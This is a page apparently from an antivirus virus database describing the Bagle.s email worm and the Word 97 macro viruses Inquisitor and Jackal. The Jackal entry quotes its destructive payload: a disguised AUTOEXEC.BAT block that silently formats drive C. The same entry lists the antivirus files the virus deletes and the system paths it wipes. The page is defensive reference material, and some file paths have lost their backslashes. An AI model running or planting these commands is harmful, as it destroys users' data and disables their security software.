Virus Database

I-Worm.Bagle.s

Description I-Worm.Bagle.s
Bagle.s is an Internet worm spreading as an attachment to infected emails.
The worm is a PE exe file about 8 KB in size. Bagle.s is compressed by FSG and the unpacked file is about 37KB in size.
Infected messages have the following characteristics:
Sender address:
random
Subject:
none
Body:
empty
Attachment name:
random characters
Attachment file type:
.exe
Installation
After launch Bagle.s copies itself into the Windows system registry as gigabit.exe and registers this file in the system registry autorun key:
[HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun]
"gigabit.exe" = "%system%gigabit.exe"
Bagle.s then creates the key:
[SOFTWAREWindows2004]
"gsed"
where it stores it's variables.
Bagle.s also launches mshearts.exe - The Miscrosoft Hearts Network.

Finally, Bagle.s attempts to connect to several remote sites and store id information from the infected machine on these sites.
Propagation
Bagle.s searches disks for files with the following extensions:
adb
asp
cfg
cgi
dbx
dhtm
eml
htm
jsp
mbx
mdx
mht
mmf
msg
nch
ods
oft
php
pl
sht
shtm
stm
tbb
txt
uin
wab
wsh
xls
xml


and sends copies of itself to all email addresses detected in these files using an inbuilt SMTP-engine.
Remote Administration
Bagle.s opens and monitors port 4751. The inbuilt backdoor function allows the master to:
Execute commands
Download files

Check other viruses! Be aware! Use Antiviral Software

Macro.Word97.Inquisitor

Description Macro.Word97.Inquisitor

This virus contains seven macros in single "Module1" module : AutoOpen, Inquisitor97, n, a, ToolsMacro, ViewVBCode, Payload. The virus replicates on documents opening. Depending on system random counter or on entering the Tools/Macro menu item the virus replaced all symbol "e" with "s" within the current document. On entering the Tools/Macro the virus also displays the MessageBox:
You have been infected by Inquisitor97

Macro.Word97.Jackal

Description Macro.Word97.Jackal

This virus contains one module "Jackal" which contains fourteen macros: AutoOpen, FileSaveAs, KillAV, Format, ToolsMacro, ViewVBCode, FileTemplates, Organizer, EditFind, HelpAbout, ToolsCustomize, ToolsOptions, Jackal, Ultras.
The virus replicates itself on opening files or saving with new name. It erases the files belonging to popular anti-virus applications:
C:Program FilesAntiViral Toolkit ProAvp32.exe
C:Program FilesAntiViral Toolkit Pro*.avc
C:Program FilesCommand SoftwareF-PROT95*.dll
C:Program FilesCommand SoftwareF-PROT95*.exe
C:Program FilesMcAfeeVirusScan95Scan.dat
C:Program FilesMcAfeeVirusScanScan.dat
C:Program FilesNorton AntiVirusViruscan.dat
C:Program FilesSymantecSymevnt.386
C:Program FilesFindVirusFindviru.drv
C:Program FilesCheyenneAntiVirus*.dll
C:Program FilesCheyenneCommonCshell.dll
C:PC-Cillin 95Lpt$vpn.*
C:PC-Cillin 95Scan32.dll
C:PC-Cillin 97Lpt$vpn.*
C:PC-Cillin 97Scan32.dll
C:eSafeProtect*.dll
C:f-macrof-macro.exe
C:TBAVW95Tbscan.sig
C:Tbavw95Tb*.*
C:VS95*.dll

On the 1st of any month it sets the password "JACKAL" in documents. On the 27th of any month it sets the password "ULTRAS". On 5, 9, 17, 25 days and during May it displays the Balloon:
Microsoft Office 97
Error, is necessary will update files

Then it appends to the C:AUTOEXEC.BAT file the commands that format the disk:
@ECHO OFF
CLS
ECHO Microsoft Corp. 1983-1997 All rights reserved
ECHO Goes preparation to renovation of your system files
ECHO Please wait this can occupy several minutes
FORMAT C: /U /C /S /AUTOTEST > NUL
ECHO.
ECHO.
ECHO.
ECHO Error at renovations of files

On 15th and 30th of any month it deletes the files:
C:*.*
C:Windows*.*
C:WindowsSystem*.*

Home